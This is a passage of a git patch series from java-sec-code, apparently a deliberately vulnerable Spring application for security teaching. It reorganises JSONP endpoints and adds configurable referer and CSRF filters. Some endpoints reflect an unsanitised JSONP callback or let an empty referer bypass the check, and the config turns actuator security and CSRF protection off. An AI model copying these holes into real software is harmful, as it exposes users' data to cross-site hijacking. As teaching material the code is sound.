From 6844b0a7f0dc9e1bfc65de94ead593dffd73b982 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Wed, 3 Jul 2019 16:11:29 +0800 Subject: [PATCH 01/67] add configure code of json to jsonp --- README.md | 2 +- README_zh.md | 2 +- .../java/org/joychou/controller/JSONP.java | 71 --------------- .../org/joychou/controller/jsonp/JSONP.java | 89 +++++++++++++++++++ .../joychou/controller/jsonp/JSONPAdvice.java | 12 +++ .../java/org/joychou/security/secFilter.java | 10 +++ src/main/resources/application.properties | 5 +- 7 files changed, 117 insertions(+), 74 deletions(-) delete mode 100644 src/main/java/org/joychou/controller/JSONP.java create mode 100644 src/main/java/org/joychou/controller/jsonp/JSONP.java create mode 100644 src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java diff --git a/README.md b/README.md index c7f42841..fe8e008b 100644 --- a/README.md +++ b/README.md @@ -15,7 +15,7 @@ Each vulnerability type code has a security vulnerability by default unless ther Sort by letter. -- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml) +- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml) - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java) - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java) - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java) diff --git a/README_zh.md b/README_zh.md index 1d8a5d3b..2cffe424 100644 --- a/README_zh.md +++ b/README_zh.md @@ -12,7 +12,7 @@ ## 漏洞代码 -- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback.xml) +- [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml) - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java) - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java) - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java) diff --git a/src/main/java/org/joychou/controller/JSONP.java b/src/main/java/org/joychou/controller/JSONP.java deleted file mode 100644 index 77bc47f4..00000000 --- a/src/main/java/org/joychou/controller/JSONP.java +++ /dev/null @@ -1,71 +0,0 @@ -package org.joychou.controller; - -import org.joychou.security.SecurityUtil; -import org.springframework.stereotype.Controller; -import org.springframework.web.bind.annotation.*; -import javax.servlet.http.HttpServletRequest; -import javax.servlet.http.HttpServletResponse; - - -/** - * @author JoyChou (joychou@joychou.org) - * @date 2018年10月24日 - */ - -@Controller -@RequestMapping("/jsonp") -public class JSONP { - - protected static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}"; - protected static String[] urlwhitelist = {"joychou.com", "joychou.org"}; - - - // http://localhost:8080/jsonp/referer?callback=test - @RequestMapping("/referer") - @ResponseBody - private static String referer(HttpServletRequest request, HttpServletResponse response) { - // JSONP的跨域设置 - response.setHeader("Access-Control-Allow-Origin", "*"); - String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; - } - - /** - * 直接访问不限制Referer,非直接访问限制Referer (开发同学喜欢这样进行JSONP测试) - * http://localhost:8080/jsonp/emptyReferer?callback=test - * - */ - @RequestMapping("/emptyReferer") - @ResponseBody - private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) { - String referer = request.getHeader("referer"); - response.setHeader("Access-Control-Allow-Origin", "*"); - - // 如果referer不为空,并且referer不在安全域名白名单内,return error - // 导致空referer就会绕过校验。开发同学为了方便测试,不太喜欢校验空Referer - if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { - return "error"; - } - - String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; - } - - // http://localhost:8080/jsonp/sec?callback=test - @RequestMapping("/sec") - @ResponseBody - private static String sec(HttpServletRequest request, HttpServletResponse response) { - // JSONP的跨域设置 - response.setHeader("Access-Control-Allow-Origin", "*"); - String referer = request.getHeader("referer"); - - if (!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { - return "error"; - } - - String callback = request.getParameter("callback"); - return callback + "(" + info + ")"; - } - - -} \ No newline at end of file diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java new file mode 100644 index 00000000..f78b2aa8 --- /dev/null +++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java @@ -0,0 +1,89 @@ +package org.joychou.controller.jsonp; + +import com.alibaba.fastjson.JSON; +import com.alibaba.fastjson.JSONObject; +import org.joychou.security.SecurityUtil; +import org.springframework.http.MediaType; +import org.springframework.web.bind.annotation.*; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; + + + +/** + * @author JoyChou (joychou@joychou.org) @ 2018.10.24 + * https://github.com/JoyChou93/java-sec-code/wiki/JSONP + */ + +@RestController +@RequestMapping("/jsonp") +public class JSONP { + + private static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}"; + private static String[] urlwhitelist = {"joychou.com", "joychou.org"}; + + + /** + * Set the response content-type to application/javascript. + * + * http://localhost:8080/jsonp/referer?callback=test + * + */ + @RequestMapping(value = "/referer", produces = "application/javascript") + private static String referer(HttpServletRequest request, HttpServletResponse response) { + String callback = request.getParameter("callback"); + return callback + "(" + info + ")"; + } + + /** + * Direct access does not check Referer, non-direct access check referer. + * Developer like to do jsonp testing like this. + * + * http://localhost:8080/jsonp/emptyReferer?callback=test + * + */ + @RequestMapping(value = "/emptyReferer", produces = "application/javascript") + private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) { + String referer = request.getHeader("referer"); + + if (null != referer && !SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { + return "error"; + } + + String callback = request.getParameter("callback"); + return callback + "(" + info + ")"; + } + + /** + * Adding callback or cback on parameter can automatically return jsonp data. + * http://localhost:8080/jsonp/advice?callback=test + * http://localhost:8080/jsonp/advice?cback=test + * + * @return Only return object, AbstractJsonpResponseBodyAdvice can be used successfully. + * Such as JSONOjbect or JavaBean. String type cannot be used. + */ + @RequestMapping(value = "/advice", produces = MediaType.APPLICATION_JSON_VALUE) + public JSONObject advice() { + return JSON.parseObject(info); + + } + + /** + * Safe code. + * http://localhost:8080/jsonp/sec?callback=test + */ + @RequestMapping(value = "/sec", produces = "application/javascript") + private static String safecode(HttpServletRequest request, HttpServletResponse response) { + String referer = request.getHeader("referer"); + + if (!SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist)) { + return "error"; + } + + String callback = request.getParameter("callback"); + return callback + "(" + info + ")"; + } + + + +} \ No newline at end of file diff --git a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java new file mode 100644 index 00000000..19b3a6e0 --- /dev/null +++ b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java @@ -0,0 +1,12 @@ +package org.joychou.controller.jsonp; + +import org.springframework.web.bind.annotation.ControllerAdvice; +import org.springframework.web.servlet.mvc.method.annotation.AbstractJsonpResponseBodyAdvice; + +@ControllerAdvice +public class JSONPAdvice extends AbstractJsonpResponseBodyAdvice { + + public JSONPAdvice() { + super("callback", "cback"); // Can set multiple paramNames + } +} diff --git a/src/main/java/org/joychou/security/secFilter.java b/src/main/java/org/joychou/security/secFilter.java index 072f7fca..a7f443f3 100644 --- a/src/main/java/org/joychou/security/secFilter.java +++ b/src/main/java/org/joychou/security/secFilter.java @@ -7,6 +7,7 @@ import javax.servlet.http.HttpServletResponse; import java.io.IOException; import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Value; /** @@ -19,6 +20,9 @@ @WebFilter(filterName = "referSecCheck", urlPatterns = "/*") public class secFilter implements Filter { + @Value("${org.joychou.security.jsonp}") + private Boolean jsonpSwitch; // get application.properties configure + @Override public void init(FilterConfig filterConfig) throws ServletException { @@ -28,6 +32,12 @@ public void init(FilterConfig filterConfig) throws ServletException { public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain) throws IOException, ServletException { + + // If don't check referer, return. + if (!jsonpSwitch) { + return ; + } + HttpServletRequest request = (HttpServletRequest) req; HttpServletResponse response = (HttpServletResponse) res; diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index cdb84e53..47fdf5a3 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -1,4 +1,7 @@ # Spring Boot Actuator Vulnerable Config management.security.enabled=false -logging.config=classpath:logback-online.xml \ No newline at end of file +logging.config=classpath:logback-online.xml + +# jsonp check referer switch +org.joychou.security.jsonp = true \ No newline at end of file From f37f9b2bc45d87653a70b4d0760e6e325508ebc9 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Wed, 3 Jul 2019 23:35:11 +0800 Subject: [PATCH 02/67] add csrf switch --- README.md | 4 ++-- README_zh.md | 4 ++-- .../{ => security}/CsrfAccessDeniedHandler.java | 10 +++++----- .../joychou/{ => security}/WebSecurityConfig.java | 14 +++++++++++++- .../security/{secFilter.java => jsonpFilter.java} | 2 +- src/main/resources/application.properties | 5 +++-- 6 files changed, 26 insertions(+), 13 deletions(-) rename src/main/java/org/joychou/{ => security}/CsrfAccessDeniedHandler.java (91%) rename src/main/java/org/joychou/{ => security}/WebSecurityConfig.java (86%) rename src/main/java/org/joychou/security/{secFilter.java => jsonpFilter.java} (97%) diff --git a/README.md b/README.md index fe8e008b..b1f4b020 100644 --- a/README.md +++ b/README.md @@ -18,13 +18,13 @@ Sort by letter. - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml) - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java) - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java) -- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java) +- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java) - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java) - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java) - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java) - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java) - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java) -- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java) +- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java) - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java) - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java) - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java) diff --git a/README_zh.md b/README_zh.md index 2cffe424..e5d00569 100644 --- a/README_zh.md +++ b/README_zh.md @@ -15,13 +15,13 @@ - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml) - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java) - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java) -- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/WebSecurityConfig.java) +- [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java) - [Deserialize](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Deserialize.java) - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java) - [File Upload](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/FileUpload.java) - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java) - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java) -- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java) +- [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java) - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java) - [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java) - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java) diff --git a/src/main/java/org/joychou/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java similarity index 91% rename from src/main/java/org/joychou/CsrfAccessDeniedHandler.java rename to src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java index ed043ac2..81b6b0f2 100644 --- a/src/main/java/org/joychou/CsrfAccessDeniedHandler.java +++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java @@ -1,4 +1,4 @@ -package org.joychou; +package org.joychou.security; import org.springframework.http.MediaType; @@ -11,12 +11,12 @@ import javax.servlet.http.HttpServletResponse; import java.io.IOException; +/** + * Design csrf access denied page. + * + */ public class CsrfAccessDeniedHandler implements AccessDeniedHandler { - /** - * Design csrf access denied page. - * - */ @Override public void handle(HttpServletRequest request, HttpServletResponse response, AccessDeniedException accessDeniedException) throws IOException, ServletException { diff --git a/src/main/java/org/joychou/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java similarity index 86% rename from src/main/java/org/joychou/WebSecurityConfig.java rename to src/main/java/org/joychou/security/WebSecurityConfig.java index 5254547e..68af7121 100644 --- a/src/main/java/org/joychou/WebSecurityConfig.java +++ b/src/main/java/org/joychou/security/WebSecurityConfig.java @@ -1,5 +1,6 @@ -package org.joychou; +package org.joychou.security; +import org.springframework.beans.factory.annotation.Value; import org.springframework.context.annotation.Configuration; import org.springframework.security.config.annotation.web.builders.HttpSecurity; import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity; @@ -10,10 +11,18 @@ import java.util.Arrays; import java.util.HashSet; + +/** + * Congifure csrf + * + */ @EnableWebSecurity @Configuration public class WebSecurityConfig extends WebSecurityConfigurerAdapter { + @Value("${org.joychou.security.csrf}") + private Boolean csrfSwitch; // get csrf switch in application.properties + RequestMatcher csrfRequestMatcher = new RequestMatcher() { // 配置不需要CSRF校验的请求方式 @@ -23,6 +32,9 @@ public class WebSecurityConfig extends WebSecurityConfigurerAdapter { @Override public boolean matches(HttpServletRequest request) { // return false表示不校验csrf + if (!csrfSwitch) { + return false; + } return !this.allowedMethods.contains(request.getMethod()); } diff --git a/src/main/java/org/joychou/security/secFilter.java b/src/main/java/org/joychou/security/jsonpFilter.java similarity index 97% rename from src/main/java/org/joychou/security/secFilter.java rename to src/main/java/org/joychou/security/jsonpFilter.java index a7f443f3..7fd2f123 100644 --- a/src/main/java/org/joychou/security/secFilter.java +++ b/src/main/java/org/joychou/security/jsonpFilter.java @@ -18,7 +18,7 @@ * */ @WebFilter(filterName = "referSecCheck", urlPatterns = "/*") -public class secFilter implements Filter { +public class jsonpFilter implements Filter { @Value("${org.joychou.security.jsonp}") private Boolean jsonpSwitch; // get application.properties configure diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index 47fdf5a3..a0469477 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -1,7 +1,8 @@ # Spring Boot Actuator Vulnerable Config management.security.enabled=false -logging.config=classpath:logback-online.xml +# logging.config=classpath:logback-online.xml # jsonp check referer switch -org.joychou.security.jsonp = true \ No newline at end of file +org.joychou.security.jsonp = true +org.joychou.security.csrf = false \ No newline at end of file From d330c45a517d9369ea33f16492648fc5ab0a3626 Mon Sep 17 00:00:00 2001 From: JoyChou Date: Thu, 4 Jul 2019 00:09:35 +0800 Subject: [PATCH 03/67] fix bug --- .../org/joychou/security/jsonpFilter.java | 21 ++++++++----------- src/main/resources/application.properties | 2 +- 2 files changed, 10 insertions(+), 13 deletions(-) diff --git a/src/main/java/org/joychou/security/jsonpFilter.java b/src/main/java/org/joychou/security/jsonpFilter.java index 7fd2f123..e88d854f 100644 --- a/src/main/java/org/joychou/security/jsonpFilter.java +++ b/src/main/java/org/joychou/security/jsonpFilter.java @@ -32,27 +32,24 @@ public void init(FilterConfig filterConfig) throws ServletException { public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain) throws IOException, ServletException { - - // If don't check referer, return. - if (!jsonpSwitch) { - return ; - } - HttpServletRequest request = (HttpServletRequest) req; HttpServletResponse response = (HttpServletResponse) res; String refer = request.getHeader("referer"); String referWhitelist[] = {"joychou.org", "joychou.com"}; - // Check referer for all GET requests with callback parameters. - if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){ - // If the check of referer fails, a 403 forbidden error page will be returned. - if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){ - response.sendRedirect("https://test.joychou.org/error3.html"); - return; + if (jsonpSwitch) { + // Check referer for all GET requests with callback parameters. + if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){ + // If the check of referer fails, a 403 forbidden error page will be returned. + if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){ + response.sendRedirect("https://test.joychou.org/error3.html"); + return; + } } } + filterChain.doFilter(req, res); } diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index a0469477..a3b3a4bb 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -4,5 +4,5 @@ management.security.enabled=false # logging.config=classpath:logback-online.xml # jsonp check referer switch -org.joychou.security.jsonp = true +org.joychou.security.jsonp = false org.joychou.security.csrf = false \ No newline at end of file From f24df6fe46e24234e9367992df06d80414e1801b Mon Sep 17 00:00:00 2001 From: JoyChou Date: Mon, 8 Jul 2019 18:04:14 +0800 Subject: [PATCH 04/67] add json to jsonp --- .../joychou/controller/jsonp/JSONPAdvice.java | 7 +- .../security/CsrfAccessDeniedHandler.java | 6 ++ .../java/org/joychou/security/HttpFilter.java | 89 +++++++++++++++++++ .../org/joychou/security/SecurityUtil.java | 14 ++- .../joychou/security/WebSecurityConfig.java | 23 +++-- .../org/joychou/security/jsonpFilter.java | 60 ------------- src/main/resources/application.properties | 27 +++++- 7 files changed, 151 insertions(+), 75 deletions(-) create mode 100644 src/main/java/org/joychou/security/HttpFilter.java delete mode 100644 src/main/java/org/joychou/security/jsonpFilter.java diff --git a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java index 19b3a6e0..094070a4 100644 --- a/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java +++ b/src/main/java/org/joychou/controller/jsonp/JSONPAdvice.java @@ -1,12 +1,15 @@ package org.joychou.controller.jsonp; +import org.springframework.beans.factory.annotation.Value; import org.springframework.web.bind.annotation.ControllerAdvice; import org.springframework.web.servlet.mvc.method.annotation.AbstractJsonpResponseBodyAdvice; + @ControllerAdvice public class JSONPAdvice extends AbstractJsonpResponseBodyAdvice { - public JSONPAdvice() { - super("callback", "cback"); // Can set multiple paramNames + // method of using @Value in constructor + public JSONPAdvice(@Value("${joychou.security.jsonp.callback}") String[] callback) { + super(callback); // Can set multiple paramNames } } diff --git a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java index 81b6b0f2..65d9e6f3 100644 --- a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java +++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java @@ -1,6 +1,8 @@ package org.joychou.security; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; import org.springframework.http.MediaType; import org.springframework.security.access.AccessDeniedException; import org.springframework.security.web.access.AccessDeniedHandler; @@ -17,9 +19,13 @@ */ public class CsrfAccessDeniedHandler implements AccessDeniedHandler { + private final Logger logger= LoggerFactory.getLogger(CsrfAccessDeniedHandler.class); + @Override public void handle(HttpServletRequest request, HttpServletResponse response, AccessDeniedException accessDeniedException) throws IOException, ServletException { + + logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" + "Referer: " + request.getHeader("referer")); response.setContentType(MediaType.TEXT_HTML_VALUE); // content-type: text/html response.setStatus(HttpServletResponse.SC_FORBIDDEN); // 403 forbidden response.getWriter().write("CSRF check failed by JoyChou."); // response contents diff --git a/src/main/java/org/joychou/security/HttpFilter.java b/src/main/java/org/joychou/security/HttpFilter.java new file mode 100644 index 00000000..99309410 --- /dev/null +++ b/src/main/java/org/joychou/security/HttpFilter.java @@ -0,0 +1,89 @@ +package org.joychou.security; + + +import javax.servlet.*; +import javax.servlet.annotation.WebFilter; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import java.io.IOException; + +import org.apache.commons.lang.StringUtils; +import org.slf4j.Logger; +import org.slf4j.LoggerFactory; +import org.springframework.beans.factory.annotation.Value; +import org.springframework.util.AntPathMatcher; +import org.springframework.util.PathMatcher; + + +/** + * Check referer for all GET requests with callback parameters. + * If the check of referer fails, a 403 forbidden error page will be returned. + * + * Still need to add @ServletComponentScan annotation in Application.java. + * + */ +@WebFilter(filterName = "referFilter", urlPatterns = "/*") +public class HttpFilter implements Filter { + + @Value("${joychou.security.referer.enabled}") + private Boolean referSecEnabled = false; + + @Value("${joychou.security.jsonp.callback}") + private String[] callbacks; + + @Value("${joychou.security.referer.hostwhitelist}") + private String[] referWhitelist; + + @Value("${joychou.security.referer.uri}") + private String[] referUris; + + @Override + public void init(FilterConfig filterConfig) throws ServletException { + + } + + private final Logger logger= LoggerFactory.getLogger(HttpFilter.class); + + @Override + public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain) + throws IOException, ServletException { + + HttpServletRequest request = (HttpServletRequest) req; + HttpServletResponse response = (HttpServletResponse) res; + + String refer = request.getHeader("referer"); + PathMatcher matcher = new AntPathMatcher(); + boolean isMatch = false; + for (String uri: referUris) { + if ( matcher.match (uri, request.getRequestURI()) ) { + isMatch = true; + break; + } + } + + if (isMatch) { + if (referSecEnabled) { + // Check referer for all GET requests with callback parameters. + for (String callback: callbacks) { + if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter(callback)) ){ + // If the check of referer fails, a 403 forbidden error page will be returned. + if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){ + logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" + "Referer: " + refer); + response.sendRedirect("https://test.joychou.org/error3.html"); + return; + } + } + } + } + } + + + + filterChain.doFilter(req, res); + } + + @Override + public void destroy() { + + } +} diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java index 6eab2cac..63de75d8 100644 --- a/src/main/java/org/joychou/security/SecurityUtil.java +++ b/src/main/java/org/joychou/security/SecurityUtil.java @@ -55,11 +55,23 @@ public static Boolean checkSSRF(String url) { /** * Suitable for: TTL isn't set to 0 & Redirect is forbidden. * - * @param url the url needs to check + * @param url The url that needs to check. * @return Safe url returns true. Dangerous url returns false. */ public static boolean checkSSRFWithoutRedirect(String url) { return !SSRFChecker.isInnerIPByUrl(url); } + /** + * Check SSRF by host white list. + * This is the simplest and most effective method to fix ssrf vul. + * + * @param url The url that needs to check. + * @param hostWlist host whitelist + * @return Safe url returns true. Dangerous url returns false. + */ + public static boolean checkSSRFByHostWlist(String url, String[] hostWlist) { + return checkURLbyEndsWith(url, hostWlist); + } + } \ No newline at end of file diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java index 68af7121..5ad22e2b 100644 --- a/src/main/java/org/joychou/security/WebSecurityConfig.java +++ b/src/main/java/org/joychou/security/WebSecurityConfig.java @@ -20,22 +20,27 @@ @Configuration public class WebSecurityConfig extends WebSecurityConfigurerAdapter { - @Value("${org.joychou.security.csrf}") - private Boolean csrfSwitch; // get csrf switch in application.properties + @Value("${joychou.security.csrf.enabled}") + private Boolean csrfEnabled = false; - RequestMatcher csrfRequestMatcher = new RequestMatcher() { + @Value("${joychou.security.csrf.exclude.url}") + private String[] csrfExcludeUrl; + + @Value("${joychou.security.csrf.method}") + private String[] csrfMethod = {"POST"}; - // 配置不需要CSRF校验的请求方式 - private final HashSet allowedMethods = new HashSet( - Arrays.asList("GET", "HEAD", "TRACE", "OPTIONS")); + RequestMatcher csrfRequestMatcher = new RequestMatcher() { @Override public boolean matches(HttpServletRequest request) { + + // 配置需要CSRF校验的请求方式, + HashSet allowedMethods = new HashSet(Arrays.asList(csrfMethod)); // return false表示不校验csrf - if (!csrfSwitch) { + if (!csrfEnabled) { return false; } - return !this.allowedMethods.contains(request.getMethod()); + return allowedMethods.contains(request.getMethod()); } }; @@ -47,7 +52,7 @@ protected void configure(HttpSecurity http) throws Exception { // 但存在后端多台服务器情况,session不能同步的问题,所以一般使用cookie模式。 http.csrf() .requireCsrfProtectionMatcher(csrfRequestMatcher) - .ignoringAntMatchers("/xxe/**", "/fastjon/**") // 不进行csrf校验的uri,多个uri使用逗号分隔 + .ignoringAntMatchers(csrfExcludeUrl) // 不进行csrf校验的uri,多个uri使用逗号分隔 .csrfTokenRepository(new CookieCsrfTokenRepository()); // 自定义csrf校验失败的代码,默认是返回403错误页面 http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler()); diff --git a/src/main/java/org/joychou/security/jsonpFilter.java b/src/main/java/org/joychou/security/jsonpFilter.java deleted file mode 100644 index e88d854f..00000000 --- a/src/main/java/org/joychou/security/jsonpFilter.java +++ /dev/null @@ -1,60 +0,0 @@ -package org.joychou.security; - - -import javax.servlet.*; -import javax.servlet.annotation.WebFilter; -import javax.servlet.http.HttpServletRequest; -import javax.servlet.http.HttpServletResponse; -import java.io.IOException; -import org.apache.commons.lang.StringUtils; -import org.springframework.beans.factory.annotation.Value; - - -/** - * Check referer for all GET requests with callback parameters. - * If the check of referer fails, a 403 forbidden error page will be returned. - * - * Still need to add @ServletComponentScan annotation in Application.java. - * - */ -@WebFilter(filterName = "referSecCheck", urlPatterns = "/*") -public class jsonpFilter implements Filter { - - @Value("${org.joychou.security.jsonp}") - private Boolean jsonpSwitch; // get application.properties configure - - @Override - public void init(FilterConfig filterConfig) throws ServletException { - - } - - @Override - public void doFilter(ServletRequest req, ServletResponse res, FilterChain filterChain) - throws IOException, ServletException { - - HttpServletRequest request = (HttpServletRequest) req; - HttpServletResponse response = (HttpServletResponse) res; - - String refer = request.getHeader("referer"); - String referWhitelist[] = {"joychou.org", "joychou.com"}; - - if (jsonpSwitch) { - // Check referer for all GET requests with callback parameters. - if (request.getMethod().equals("GET") && StringUtils.isNotBlank(request.getParameter("callback")) ){ - // If the check of referer fails, a 403 forbidden error page will be returned. - if (!SecurityUtil.checkURLbyEndsWith(refer, referWhitelist)){ - response.sendRedirect("https://test.joychou.org/error3.html"); - return; - } - } - } - - - filterChain.doFilter(req, res); - } - - @Override - public void destroy() { - - } -} diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties index a3b3a4bb..ddf4d13b 100644 --- a/src/main/resources/application.properties +++ b/src/main/resources/application.properties @@ -3,6 +3,27 @@ management.security.enabled=false # logging.config=classpath:logback-online.xml -# jsonp check referer switch -org.joychou.security.jsonp = false -org.joychou.security.csrf = false \ No newline at end of file + + +### check referer configuration begins ### +joychou.security.referer.enabled = true +joychou.security.referer.hostwhitelist = joychou.org, joychou.com +# Only support ant url style. +joychou.security.referer.uri = /jsonp/** +### check referer configuration ends ### + + +### csrf configuration begins ### +# csrf token check +joychou.security.csrf.enabled = true +# URI without CSRF check (only support ANT url format) +joychou.security.csrf.exclude.url = /xxe/**, /fastjon/** +# method for CSRF check +joychou.security.csrf.method = POST +### csrf configuration ends ### + + +### jsonp configuration begins ### # auto convert json to jsonp +# callback parameters name +joychou.security.jsonp.callback = callback, _callback +### jsonp configuration ends ### \ No newline at end of file From cc946392d249b8fca951764a89bdcff4f66a822c Mon Sep 17 00:00:00 2001 From: JoyChou Date: Wed, 17 Jul 2019 22:07:45 +0800 Subject: [PATCH 05/67] add mybatis sql --- java-sec-code.iml | 9 ++ pom.xml | 8 ++ .../java/org/joychou/controller/SQLI.java | 135 +++++++++++++++--- .../org/joychou/controller/jsonp/JSONP.java | 2 +- src/main/java/org/joychou/dao/User.java | 34 +++++ .../java/org/joychou/mapper/UserMapper.java | 18 +++ src/main/resources/application.properties | 7 + src/main/resources/mapper/UserMapper.xml | 23 +++ 8 files changed, 214 insertions(+), 22 deletions(-) create mode 100644 src/main/java/org/joychou/dao/User.java create mode 100644 src/main/java/org/joychou/mapper/UserMapper.java create mode 100644 src/main/resources/mapper/UserMapper.xml diff --git a/java-sec-code.iml b/java-sec-code.iml index 8a7c0cb7..10a8f2b2 100644 --- a/java-sec-code.iml +++ b/java-sec-code.iml @@ -171,5 +171,14 @@ + + + + + + + + + \ No newline at end of file diff --git a/pom.xml b/pom.xml index bcfd042c..1c13246a 100644 --- a/pom.xml +++ b/pom.xml @@ -169,6 +169,14 @@ 3.1 + + + + 